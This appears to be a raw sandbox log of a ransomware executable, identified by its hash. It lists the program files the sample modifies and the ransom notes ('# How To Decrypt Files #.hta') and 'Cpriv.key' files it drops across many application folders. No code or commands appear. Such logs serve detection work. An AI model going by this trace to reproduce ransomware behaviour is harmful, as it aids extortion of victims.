de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0292152.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152436.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.DE.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14867_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_On.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_justify.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\msado28.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\VBHW6.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107288.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Installer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151041.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PUBBA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\STRTEDGE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_choosecolor.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01330_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR51F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.HLP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\OneNote.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02233_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\STUBBY1.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0212701.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\x86\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00419_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0250997.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GROOVE_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\Bibliography\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SlateBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SMSS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\net.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SAVE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BROCHURE.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237225.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21313_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00058_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02426_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\CONVERT\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_RGB_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200189.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Trek.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\BillingStatement.xltx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18192_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00351_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\daisies.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WING2.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Earthy.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OneNote\SendtoOneNoteFilter.gpd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL109.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\browser\features\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\SNEEZE.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14654_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PowerPoint.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15018_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Library\Analysis\ATPVBAEN.XLAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\favicon.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00157_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\SPANISH.LNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR31F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00790_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01172_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsBlankPage.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BS2BARB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02388_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14828_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\sr.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\content-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10300_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NextMenuButtonIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00202_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15171_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePageScript.js 